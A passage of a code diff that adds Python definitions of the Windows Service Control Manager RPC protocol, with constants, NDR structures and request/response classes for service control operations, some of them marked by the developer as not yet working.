+SC_STATUS_PROCESS_INFO = 0
+
+# Notify Mask
+SERVICE_NOTIFY_CREATED = 0x00000080
+SERVICE_NOTIFY_CONTINUE_PENDING = 0x00000010
+SERVICE_NOTIFY_DELETE_PENDING = 0x00000200
+SERVICE_NOTIFY_DELETED = 0x00000100
+SERVICE_NOTIFY_PAUSE_PENDING = 0x00000020
+SERVICE_NOTIFY_PAUSED = 0x00000040
+SERVICE_NOTIFY_RUNNING = 0x00000008
+SERVICE_NOTIFY_START_PENDING = 0x00000002
+SERVICE_NOTIFY_STOP_PENDING = 0x00000004
+SERVICE_NOTIFY_STOPPED = 0x00000001
+
+# SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW Reasons
+SERVICE_STOP_CUSTOM = 0x20000000
+SERVICE_STOP_PLANNED = 0x40000000
+SERVICE_STOP_UNPLANNED = 0x10000000
+
+# SERVICE_TRIGGER triggers
+SERVICE_TRIGGER_TYPE_DEVICE_INTERFACE_ARRIVAL = 0x00000001
+SERVICE_TRIGGER_TYPE_IP_ADDRESS_AVAILABILITY = 0x00000002
+SERVICE_TRIGGER_TYPE_DOMAIN_JOIN = 0x00000003
+SERVICE_TRIGGER_TYPE_FIREWALL_PORT_EVENT = 0x00000004
+SERVICE_TRIGGER_TYPE_GROUP_POLICY = 0x00000005
+SERVICE_TRIGGER_TYPE_CUSTOM = 0x00000020
+
+# SERVICE_TRIGGER actions
+SERVICE_TRIGGER_ACTION_SERVICE_START = 0x00000001
+SERVICE_TRIGGER_ACTION_SERVICE_STOP = 0x00000002
+
+# SERVICE_TRIGGER subTypes
+DOMAIN_JOIN_GUID = '1ce20aba-9851-4421-9430-1ddeb766e809'
+DOMAIN_LEAVE_GUID = 'ddaf516e-58c2-4866-9574-c3b615d42ea1'
+FIREWALL_PORT_OPEN_GUID = 'b7569e07-8421-4ee0-ad10-86915afdad09'
+FIREWALL_PORT_CLOSE_GUID = 'a144ed38-8e12-4de4-9d96-e64740b1a524'
+MACHINE_POLICY_PRESENT_GUID = '659FCAE6-5BDB-4DA9-B1FF-CA2A178D46E0'
+NETWORK_MANAGER_FIRST_IP_ADDRESS_ARRIVAL_GUID = '4f27f2de-14e2-430b-a549-7cd48cbc8245'
+NETWORK_MANAGER_LAST_IP_ADDRESS_REMOVAL_GUID = 'cc4ba62a-162e-4648-847a-b6bdf993e335'
+USER_POLICY_PRESENT_GUID = '54FB46C8-F089-464C-B1FD-59D1B62C3B50'
+
+# SERVICE_TRIGGER_SPECIFIC_DATA_ITEM dataTypes
+SERVICE_TRIGGER_DATA_TYPE_BINARY = 0x00000001
+SERVICE_TRIGGER_DATA_TYPE_STRING = 0x00000002
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+class SC_RPC_HANDLE(NDRSTRUCT):
+ structure = (
+ ('Data','20s=""'),
+ )
+ def getAlignment(self):
+ return 1
+
+SC_NOTIFY_RPC_HANDLE = SC_RPC_HANDLE
+
+class SERVICE_STATUS(NDRSTRUCT):
+ structure = (
+ ('dwServiceType',DWORD),
+ ('dwCurrentState',DWORD),
+ ('dwControlsAccepted',DWORD),
+ ('dwWin32ExitCode',DWORD),
+ ('dwServiceSpecificExitCode',DWORD),
+ ('dwCheckPoint',DWORD),
+ ('dwWaitHint',DWORD),
+ )
+
+class QUERY_SERVICE_CONFIGW(NDRSTRUCT):
+ structure = (
+ ('dwServiceType',DWORD),
+ ('dwStartType',DWORD),
+ ('dwErrorControl',DWORD),
+ ('lpBinaryPathName', LPWSTR),
+ ('lpLoadOrderGroup',LPWSTR),
+ ('dwTagId',DWORD),
+ ('lpDependencies',LPWSTR),
+ ('lpServiceStartName',LPWSTR),
+ ('lpDisplayName',LPWSTR),
+ )
+
+class SC_RPC_LOCK(NDRSTRUCT):
+ structure = (
+ ('Data','20s=""'),
+ )
+ def getAlignment(self):
+ return 1
+
+class LPSERVICE_STATUS(NDRPOINTER):
+ referent = (
+ ('Data',SERVICE_STATUS),
+ )
+
+SECURITY_INFORMATION = ULONG
+
+BOUNDED_DWORD_256K = DWORD
+
+class LPBOUNDED_DWORD_256K(NDRPOINTER):
+ referent = (
+ ('Data', BOUNDED_DWORD_256K),
+ )
+
+SVCCTL_HANDLEW = LPWSTR
+
+class ENUM_SERVICE_STATUSW(NDRSTRUCT):
+ structure = (
+ ('lpServiceName',LPWSTR),
+ ('lpDisplayName',LPWSTR),
+ ('ServiceStatus',SERVICE_STATUS),
+ )
+
+class LPQUERY_SERVICE_CONFIGW(NDRPOINTER):
+ referent = (
+ ('Data', QUERY_SERVICE_CONFIGW),
+ )
+
+BOUNDED_DWORD_8K = DWORD
+BOUNDED_DWORD_4K = DWORD
+
+class STRING_PTRSW(NDRSTRUCT):
+ structure = (
+ ('Data',NDRUniConformantArray),
+ )
+ def __init__(self, data = None, isNDR64 = False):
+ NDR.__init__(self,None,isNDR64)
+ self.fields['Data'].item = LPWSTR
+ if data is not None:
+ self.fromString(data)
+
+class UNIQUE_STRING_PTRSW(NDRPOINTER):
+ referent = (
+ ('Data', STRING_PTRSW),
+ )
+
+class QUERY_SERVICE_LOCK_STATUSW(NDRSTRUCT):
+ structure = (
+ ('fIsLocked',DWORD),
+ ('lpLockOwner',LPWSTR),
+ ('dwLockDuration',DWORD),
+ )
+
+class SERVICE_DESCRIPTION_WOW64(NDRSTRUCT):
+ structure = (
+ ('dwDescriptionOffset', DWORD),
+ )
+
+class SERVICE_DESCRIPTIONW(NDRSTRUCT):
+ structure = (
+ ('lpDescription', LPWSTR),
+ )
+
+class LPSERVICE_DESCRIPTIONW(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_DESCRIPTIONW),
+ )
+
+class SERVICE_FAILURE_ACTIONS_WOW64(NDRSTRUCT):
+ structure = (
+ ('dwResetPeriod', DWORD),
+ ('dwRebootMsgOffset', DWORD),
+ ('dwCommandOffset', DWORD),
+ ('cActions', DWORD),
+ ('dwsaActionsOffset', DWORD),
+ )
+
+class SC_ACTION(NDRSTRUCT):
+ structure = (
+ ('Type', DWORD),
+ ('Delay', DWORD) ,
+ )
+
+class SC_ACTIONS(NDRSTRUCT):
+ structure = (
+ ('Data', NDRUniConformantArray),
+ )
+ def __init__(self, data = None, isNDR64 = False):
+ NDR.__init__(self,None,isNDR64)
+ self.fields['Data'].item = SC_ACTION
+ if data is not None:
+ self.fromString(data)
+
+class SERVICE_FAILURE_ACTIONSW(NDRSTRUCT):
+ structure = (
+ ('dwResetPeriod', DWORD),
+ ('lpRebootMsg', LPWSTR) ,
+ ('lpCommand', LPWSTR) ,
+ ('cActions', DWORD) ,
+ ('lpsaActions', SC_ACTIONS) ,
+ )
+
+class LPSERVICE_FAILURE_ACTIONSW(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_FAILURE_ACTIONSW),
+ )
+
+class SERVICE_FAILURE_ACTIONS_FLAG(NDRSTRUCT):
+ structure = (
+ ('fFailureActionsOnNonCrashFailures', BOOL),
+ )
+
+class LPSERVICE_FAILURE_ACTIONS_FLAG(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_FAILURE_ACTIONS_FLAG),
+ )
+
+class SERVICE_DELAYED_AUTO_START_INFO(NDRSTRUCT):
+ structure = (
+ ('fDelayedAutostart', BOOL),
+ )
+
+class LPSERVICE_DELAYED_AUTO_START_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_DELAYED_AUTO_START_INFO),
+ )
+
+class SERVICE_SID_INFO(NDRSTRUCT):
+ structure = (
+ ('dwServiceSidType', DWORD),
+ )
+
+class LPSERVICE_SID_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_SID_INFO),
+ )
+
+
+class SERVICE_RPC_REQUIRED_PRIVILEGES_INFO(NDRSTRUCT):
+ structure = (
+ ('cbRequiredPrivileges',DWORD),
+ ('pRequiredPrivileges',LPBYTE),
+ )
+ def getData(self, soFar = 0):
+ self['cbRequiredPrivileges'] = len(self['pRequiredPrivileges'])
+ return NDR.getData(self, soFar = 0)
+
+
+class LPSERVICE_RPC_REQUIRED_PRIVILEGES_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_RPC_REQUIRED_PRIVILEGES_INFO),
+ )
+
+class SERVICE_REQUIRED_PRIVILEGES_INFO_WOW64(NDRSTRUCT):
+ structure = (
+ ('dwRequiredPrivilegesOffset', DWORD),
+ )
+
+class SERVICE_PRESHUTDOWN_INFO(NDRSTRUCT):
+ structure = (
+ ('dwPreshutdownTimeout', DWORD),
+ )
+
+class LPSERVICE_PRESHUTDOWN_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_PRESHUTDOWN_INFO),
+ )
+
+class SERVICE_STATUS_PROCESS(NDRSTRUCT):
+ structure = (
+ ('dwServiceType', DWORD),
+ ('dwCurrentState', DWORD),
+ ('dwControlsAccepted', DWORD),
+ ('dwWin32ExitCode', DWORD),
+ ('dwServiceSpecificExitCode', DWORD),
+ ('dwCheckPoint', DWORD),
+ ('dwWaitHint', DWORD),
+ ('dwProcessId', DWORD),
+ ('dwServiceFlags', DWORD),
+ )
+
+class UCHAR_16(NDRSTRUCT):
+ structure = (
+ ('Data', '16s=""'),
+ )
+ def getAlignment(self):
+ return 1
+
+class SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1(NDRSTRUCT):
+ structure = (
+ ('ullThreadId',ULONGLONG),
+ ('dwNotifyMask',DWORD),
+ ('CallbackAddressArray',UCHAR_16),
+ ('CallbackParamAddressArray',UCHAR_16),
+ ('ServiceStatus', SERVICE_STATUS_PROCESS),
+ ('dwNotificationStatus',DWORD),
+ ('dwSequence',DWORD),
+ )
+
+class SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2(NDRSTRUCT):
+ structure = (
+ ('ullThreadId',ULONGLONG),
+ ('dwNotifyMask',DWORD),
+ ('CallbackAddressArray',UCHAR_16),
+ ('CallbackParamAddressArray',UCHAR_16),
+ ('ServiceStatus',SERVICE_STATUS_PROCESS),
+ ('dwNotificationStatus',DWORD),
+ ('dwSequence',DWORD),
+ ('dwNotificationTriggered',DWORD),
+ ('pszServiceNames',LPWSTR),
+ )
+
+class PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1),
+ )
+
+class PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2),
+ )
+
+class SC_RPC_NOTIFY_PARAMS(NDRUNION):
+ union = {
+ 1: ('pStatusChangeParam1', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1),
+ 2: ('pStatusChangeParams', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2),
+ }
+
+class SC_RPC_NOTIFY_PARAMS_ARRAY(NDRUniConformantArray):
+ item = SC_RPC_NOTIFY_PARAMS
+
+class PSC_RPC_NOTIFY_PARAMS_LIST(NDRSTRUCT):
+ structure = (
+ ('cElements',BOUNDED_DWORD_4K),
+ ('NotifyParamsArray', SC_RPC_NOTIFY_PARAMS_ARRAY),
+ )
+
+class SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW(NDRSTRUCT):
+ structure = (
+ ('dwReason', DWORD),
+ ('pszComment', LPWSTR),
+ )
+
+class SERVICE_TRIGGER_SPECIFIC_DATA_ITEM(NDRSTRUCT):
+ structure = (
+ ('dwDataType',DWORD ),
+ ('cbData',DWORD),
+ ('pData', LPBYTE),
+ )
+ def getData(self, soFar = 0):
+ if self['pData'] != 0:
+ self['cbData'] = len(self['pData'])
+ return NDR.getData(self, soFar)
+
+class SERVICE_TRIGGER_SPECIFIC_DATA_ITEM_ARRAY(NDRUniConformantArray):
+ item = SERVICE_TRIGGER_SPECIFIC_DATA_ITEM
+
+class PSERVICE_TRIGGER_SPECIFIC_DATA_ITEM(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_TRIGGER_SPECIFIC_DATA_ITEM_ARRAY),
+ )
+
+class SERVICE_TRIGGER(NDRSTRUCT):
+ structure = (
+ ('dwTriggerType', DWORD),
+ ('dwAction', DWORD),
+ ('pTriggerSubtype', PGUID),
+ ('cDataItems', DWORD),
+ ('pDataItems', PSERVICE_TRIGGER_SPECIFIC_DATA_ITEM),
+ )
+ def getData(self, soFar = 0):
+ if self['pDataItems'] != 0:
+ self['cDataItems'] = len(self['pDataItems'])
+ return NDR.getData(self, soFar)
+
+class SERVICE_TRIGGER_ARRAY(NDRUniConformantArray):
+ item = SERVICE_TRIGGER
+
+class PSERVICE_TRIGGER(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_TRIGGER_ARRAY),
+ )
+
+class SERVICE_CONTROL_STATUS_REASON_OUT_PARAMS(NDRSTRUCT):
+ structure = (
+ ('ServiceStatus', SERVICE_STATUS_PROCESS),
+ )
+
+class SERVICE_TRIGGER_INFO(NDRSTRUCT):
+ structure = (
+ ('cTriggers', DWORD),
+ ('pTriggers', PSERVICE_TRIGGER),
+ ('pReserved', NDRPOINTERNULL ),
+ )
+ def getData(self, soFar = 0):
+ if self['pTriggers'] != 0:
+ self['cTriggers'] = len(self['pTriggers'])
+ return NDR.getData(self, soFar)
+
+class PSERVICE_TRIGGER_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_TRIGGER_INFO),
+ )
+
+class SERVICE_PREFERRED_NODE_INFO(NDRSTRUCT):
+ structure = (
+ ('usPreferredNode', USHORT),
+ ('fDelete', BOOL),
+ )
+
+class LPSERVICE_PREFERRED_NODE_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_PREFERRED_NODE_INFO),
+ )
+
+class SERVICE_RUNLEVEL_INFO(NDRSTRUCT):
+ structure = (
+ ('eLowestRunLevel', DWORD),
+ )
+
+class PSERVICE_RUNLEVEL_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_RUNLEVEL_INFO),
+ )
+
+class SERVICE_MANAGEDACCOUNT_INFO(NDRSTRUCT):
+ structure = (
+ ('fIsManagedAccount', DWORD),
+ )
+
+class PSERVICE_MANAGEDACCOUNT_INFO(NDRPOINTER):
+ referent = (
+ ('Data', SERVICE_MANAGEDACCOUNT_INFO),
+ )
+
+class SC_RPC_CONFIG_INFOW_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', ULONG),
+ )
+
+ union = {
+ 1: ('psd', LPSERVICE_DESCRIPTIONW),
+ 2: ('psfa',LPSERVICE_FAILURE_ACTIONSW ),
+ 3: ('psda',LPSERVICE_DELAYED_AUTO_START_INFO),
+ 4: ('psfaf',LPSERVICE_FAILURE_ACTIONS_FLAG),
+ 5: ('pssid',LPSERVICE_SID_INFO),
+ 6: ('psrp',LPSERVICE_RPC_REQUIRED_PRIVILEGES_INFO),
+ 7: ('psps',LPSERVICE_PRESHUTDOWN_INFO),
+ 8: ('psti',PSERVICE_TRIGGER_INFO),
+ 9: ('pspn',LPSERVICE_PREFERRED_NODE_INFO),
+ 10: ('psri',PSERVICE_RUNLEVEL_INFO),
+ 11: ('psma',PSERVICE_MANAGEDACCOUNT_INFO),
+ }
+
+class SC_RPC_CONFIG_INFOW(NDRSTRUCT):
+ structure = (
+ ('dwInfoLevel', DWORD),
+ ('Union', SC_RPC_CONFIG_INFOW_UNION),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+class RCloseServiceHandle(NDRCALL):
+ opnum = 0
+ structure = (
+ ('hSCObject',SC_RPC_HANDLE),
+ )
+
+class RCloseServiceHandleResponse(NDRCALL):
+ structure = (
+ ('hSCObject',SC_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+class RControlService(NDRCALL):
+ opnum = 1
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwControl',DWORD),
+ )
+
+class RControlServiceResponse(NDRCALL):
+ structure = (
+ ('lpServiceStatus',SERVICE_STATUS),
+ ('ErrorCode', DWORD),
+ )
+
+class RDeleteService(NDRCALL):
+ opnum = 2
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ )
+
+class RDeleteServiceResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RLockServiceDatabase(NDRCALL):
+ opnum = 3
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ )
+
+class RLockServiceDatabaseResponse(NDRCALL):
+ structure = (
+ ('lpLock',SC_RPC_LOCK),
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceObjectSecurity(NDRCALL):
+ opnum = 4
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwSecurityInformation',SECURITY_INFORMATION),
+ ('cbBufSize',DWORD),
+ )
+
+class RQueryServiceObjectSecurityResponse(NDRCALL):
+ structure = (
+ ('lpSecurityDescriptor', BYTE_ARRAY),
+ ('pcbBytesNeeded',BOUNDED_DWORD_256K),
+ ('ErrorCode', DWORD),
+ )
+
+class RSetServiceObjectSecurity(NDRCALL):
+ opnum = 5
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwSecurityInformation',SECURITY_INFORMATION),
+ ('lpSecurityDescriptor',LPBYTE),
+ ('cbBufSize',DWORD),
+ )
+
+class RSetServiceObjectSecurityResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceStatus(NDRCALL):
+ opnum = 6
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ )
+
+class RQueryServiceStatusResponse(NDRCALL):
+ structure = (
+ ('lpServiceStatus',SERVICE_STATUS),
+ ('ErrorCode', DWORD),
+ )
+
+class RSetServiceStatus(NDRCALL):
+ opnum = 7
+ structure = (
+ ('hServiceStatus',SC_RPC_HANDLE),
+ ('lpServiceStatus',SERVICE_STATUS),
+ )
+
+class RSetServiceStatusResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RUnlockServiceDatabase(NDRCALL):
+ opnum = 8
+ structure = (
+ ('Lock',SC_RPC_LOCK),
+ )
+
+class RUnlockServiceDatabaseResponse(NDRCALL):
+ structure = (
+ ('Lock',SC_RPC_LOCK),
+ ('ErrorCode', DWORD),
+ )
+
+class RNotifyBootConfigStatus(NDRCALL):
+ opnum = 9
+ structure = (
+ ('lpMachineName',SVCCTL_HANDLEW),
+ ('BootAcceptable',DWORD),
+ )
+
+class RNotifyBootConfigStatusResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RChangeServiceConfigW(NDRCALL):
+ opnum = 11
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwServiceType',DWORD),
+ ('dwStartType',DWORD),
+ ('dwErrorControl',DWORD),
+ ('lpBinaryPathName',LPWSTR),
+ ('lpLoadOrderGroup',LPWSTR),
+ ('lpdwTagId',LPDWORD),
+ ('lpDependencies',LPBYTE),
+ ('dwDependSize',DWORD),
+ ('lpServiceStartName',LPWSTR),
+ ('lpPassword',LPBYTE),
+ ('dwPwSize',DWORD),
+ ('lpDisplayName',LPWSTR),
+ )
+
+class RChangeServiceConfigWResponse(NDRCALL):
+ structure = (
+ ('lpdwTagId',LPDWORD),
+ ('ErrorCode', DWORD),
+ )
+
+class RCreateServiceW(NDRCALL):
+ opnum = 12
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('lpServiceName',WSTR),
+ ('lpDisplayName',LPWSTR),
+ ('dwDesiredAccess',DWORD),
+ ('dwServiceType',DWORD),
+ ('dwStartType',DWORD),
+ ('dwErrorControl',DWORD),
+ ('lpBinaryPathName',WSTR),
+ ('lpLoadOrderGroup',LPWSTR),
+ ('lpdwTagId',LPDWORD),
+ ('lpDependencies',LPBYTE),
+ ('dwDependSize',DWORD),
+ ('lpServiceStartName',LPWSTR),
+ ('lpPassword',LPBYTE),
+ ('dwPwSize',DWORD),
+ )
+
+class RCreateServiceWResponse(NDRCALL):
+ structure = (
+ ('lpdwTagId',LPWSTR),
+ ('lpServiceHandle',SC_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+class REnumDependentServicesW(NDRCALL):
+ opnum = 13
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwServiceState',DWORD),
+ ('cbBufSize',DWORD),
+ )
+
+class REnumDependentServicesWResponse(NDRCALL):
+ structure = (
+ ('lpServices',NDRUniConformantArray),
+ ('pcbBytesNeeded',BOUNDED_DWORD_256K),
+ ('lpServicesReturned',BOUNDED_DWORD_256K),
+ ('ErrorCode', DWORD),
+ )
+
+class REnumServicesStatusW(NDRCALL):
+ opnum = 14
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('dwServiceType',DWORD),
+ ('dwServiceState',DWORD),
+ ('cbBufSize',DWORD),
+ ('lpResumeIndex',LPBOUNDED_DWORD_256K),
+ )
+
+class REnumServicesStatusWResponse(NDRCALL):
+ structure = (
+ ('lpBuffer',NDRUniConformantArray),
+ ('pcbBytesNeeded',BOUNDED_DWORD_256K),
+ ('lpServicesReturned',BOUNDED_DWORD_256K),
+ ('lpResumeIndex',LPBOUNDED_DWORD_256K),
+ ('ErrorCode', DWORD),
+ )
+
+class ROpenSCManagerW(NDRCALL):
+ opnum = 15
+ structure = (
+ ('lpMachineName',SVCCTL_HANDLEW),
+ ('lpDatabaseName',LPWSTR),
+ ('dwDesiredAccess',DWORD),
+ )
+
+class ROpenSCManagerWResponse(NDRCALL):
+ structure = (
+ ('lpScHandle',SC_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+class ROpenServiceW(NDRCALL):
+ opnum = 16
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('lpServiceName',WSTR),
+ ('dwDesiredAccess',DWORD),
+ )
+
+class ROpenServiceWResponse(NDRCALL):
+ structure = (
+ ('lpServiceHandle',SC_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceConfigW(NDRCALL):
+ opnum = 17
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('cbBufSize',DWORD),
+ )
+
+class RQueryServiceConfigWResponse(NDRCALL):
+ structure = (
+ ('lpServiceConfig',QUERY_SERVICE_CONFIGW),
+ ('pcbBytesNeeded',BOUNDED_DWORD_8K),
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceLockStatusW(NDRCALL):
+ opnum = 18
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('cbBufSize',DWORD),
+ )
+
+class RQueryServiceLockStatusWResponse(NDRCALL):
+ structure = (
+ ('lpLockStatus',QUERY_SERVICE_LOCK_STATUSW),
+ ('pcbBytesNeeded',BOUNDED_DWORD_4K),
+ ('ErrorCode', DWORD),
+ )
+
+class RStartServiceW(NDRCALL):
+ opnum = 19
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('argc',DWORD),
+ ('argv',UNIQUE_STRING_PTRSW),
+ )
+
+class RStartServiceWResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RGetServiceDisplayNameW(NDRCALL):
+ opnum = 20
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('lpServiceName',WSTR),
+ ('lpcchBuffer',DWORD),
+ )
+
+class RGetServiceDisplayNameWResponse(NDRCALL):
+ structure = (
+ ('lpDisplayName',WSTR),
+ ('lpcchBuffer',DWORD),
+ ('ErrorCode', DWORD),
+ )
+
+class RGetServiceKeyNameW(NDRCALL):
+ opnum = 21
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('lpDisplayName',WSTR),
+ ('lpcchBuffer',DWORD),
+ )
+
+class RGetServiceKeyNameWResponse(NDRCALL):
+ structure = (
+ ('lpDisplayName',WSTR),
+ ('lpcchBuffer',DWORD),
+ ('ErrorCode', DWORD),
+ )
+
+class REnumServiceGroupW(NDRCALL):
+ opnum = 35
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('dwServiceType',DWORD),
+ ('dwServiceState',DWORD),
+ ('cbBufSize',DWORD),
+ ('lpResumeIndex',LPBOUNDED_DWORD_256K),
+ ('pszGroupName',LPWSTR),
+ )
+
+class REnumServiceGroupWResponse(NDRCALL):
+ structure = (
+ ('lpBuffer',LPBYTE),
+ ('pcbBytesNeeded',BOUNDED_DWORD_256K),
+ ('lpServicesReturned',BOUNDED_DWORD_256K),
+ ('lpResumeIndex',BOUNDED_DWORD_256K),
+ ('ErrorCode', DWORD),
+ )
+
+class RChangeServiceConfig2W(NDRCALL):
+ opnum = 37
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('Info',SC_RPC_CONFIG_INFOW),
+ )
+
+class RChangeServiceConfig2WResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceConfig2W(NDRCALL):
+ opnum = 39
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwInfoLevel',DWORD),
+ ('cbBufSize',DWORD),
+ )
+
+class RQueryServiceConfig2WResponse(NDRCALL):
+ structure = (
+ ('lpBuffer',NDRUniConformantArray),
+ ('pcbBytesNeeded',BOUNDED_DWORD_8K),
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceStatusEx(NDRCALL):
+ opnum = 40
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('InfoLevel',DWORD),
+ ('cbBufSize',DWORD),
+ )
+
+class RQueryServiceStatusExResponse(NDRCALL):
+ structure = (
+ ('lpBuffer',NDRUniConformantArray),
+ ('pcbBytesNeeded',BOUNDED_DWORD_8K),
+ ('ErrorCode', DWORD),
+ )
+
+class REnumServicesStatusExW(NDRCALL):
+ opnum = 42
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('InfoLevel',DWORD),
+ ('dwServiceType',DWORD),
+ ('dwServiceState',DWORD),
+ ('cbBufSize',DWORD),
+ ('lpResumeIndex',LPBOUNDED_DWORD_256K),
+ ('pszGroupName',LPWSTR),
+ )
+
+class REnumServicesStatusExWResponse(NDRCALL):
+ structure = (
+ ('lpBuffer',NDRUniConformantArray),
+ ('pcbBytesNeeded',BOUNDED_DWORD_256K),
+ ('lpServicesReturned',BOUNDED_DWORD_256K),
+ ('lpResumeIndex',BOUNDED_DWORD_256K),
+ ('ErrorCode', DWORD),
+ )
+
+class RCreateServiceWOW64W(NDRCALL):
+ opnum = 45
+ structure = (
+ ('hSCManager',SC_RPC_HANDLE),
+ ('lpServiceName',WSTR),
+ ('lpDisplayName',LPWSTR),
+ ('dwDesiredAccess',DWORD),
+ ('dwServiceType',DWORD),
+ ('dwStartType',DWORD),
+ ('dwErrorControl',DWORD),
+ ('lpBinaryPathName',WSTR),
+ ('lpLoadOrderGroup',LPWSTR),
+ ('lpdwTagId',LPDWORD),
+ ('lpDependencies',LPBYTE),
+ ('dwDependSize',DWORD),
+ ('lpServiceStartName',LPWSTR),
+ ('lpPassword',LPBYTE),
+ ('dwPwSize',DWORD),
+ )
+
+class RCreateServiceWOW64WResponse(NDRCALL):
+ structure = (
+ ('lpdwTagId',LPWSTR),
+ ('lpServiceHandle',SC_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+# Still not working, for some reason something changes in the way the pointer inside SC_RPC_NOTIFY_PARAMS is marshalled here
+class RNotifyServiceStatusChange(NDRCALL):
+ opnum = 47
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('NotifyParams',SC_RPC_NOTIFY_PARAMS),
+ ('pClientProcessGuid',GUID),
+ )
+
+class RNotifyServiceStatusChangeResponse(NDRCALL):
+ structure = (
+ ('pSCMProcessGuid',GUID),
+ ('pfCreateRemoteQueue',PBOOL),
+ ('phNotify',SC_NOTIFY_RPC_HANDLE),
+ ('ErrorCode', DWORD),
+ )
+
+# Not working, until I don't fix the previous one
+class RGetNotifyResults(NDRCALL):
+ opnum = 48
+ structure = (
+ ('hNotify',SC_NOTIFY_RPC_HANDLE),
+ )
+
+class RGetNotifyResultsResponse(NDRCALL):
+ structure = (
+ ('ppNotifyParams',PSC_RPC_NOTIFY_PARAMS_LIST),
+ ('ErrorCode', DWORD),
+ )
+
+# Not working, until I don't fix the previous ones
+class RCloseNotifyHandle(NDRCALL):
+ opnum = 49
+ structure = (
+ ('phNotify',SC_NOTIFY_RPC_HANDLE),
+ )
+
+class RCloseNotifyHandleResponse(NDRCALL):
+ structure = (
+ ('phNotify',SC_NOTIFY_RPC_HANDLE),
+ ('pfApcFired',PBOOL),
+ ('ErrorCode', DWORD),
+ )
+
+# Not working, returning bad_stub_data
+class RControlServiceExW(NDRCALL):
+ opnum = 51
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwControl',DWORD),
+ ('dwInfoLevel',DWORD),
+ ('pControlInParams',SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW),
+ )
+
+class RControlServiceExWResponse(NDRCALL):
+ structure = (
+ ('pControlOutParams',SERVICE_CONTROL_STATUS_REASON_OUT_PARAMS),
+ ('ErrorCode', DWORD),
+ )
+
+class RQueryServiceConfigEx(NDRCALL):
+ opnum = 56
+ structure = (
+ ('hService',SC_RPC_HANDLE),
+ ('dwInfoLevel',DWORD),
+ )
+
+class RQueryServiceConfigExResponse(NDRCALL):
+ structure = (
+ ('pInfo',SC_RPC_CONFIG_INFOW),
+ ('ErrorCode', DWORD),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (RCloseServiceHandle, RCloseServiceHandleResponse),
+ 1 : (RControlService, RControlServiceResponse),
+ 2 : (RDeleteService, RDeleteServiceResponse),
+ 3 : (RLockServiceDatabase, RLockServiceDatabaseResponse),
+ 4 : (RQueryServiceObjectSecurity, RQueryServiceObjectSecurityResponse),
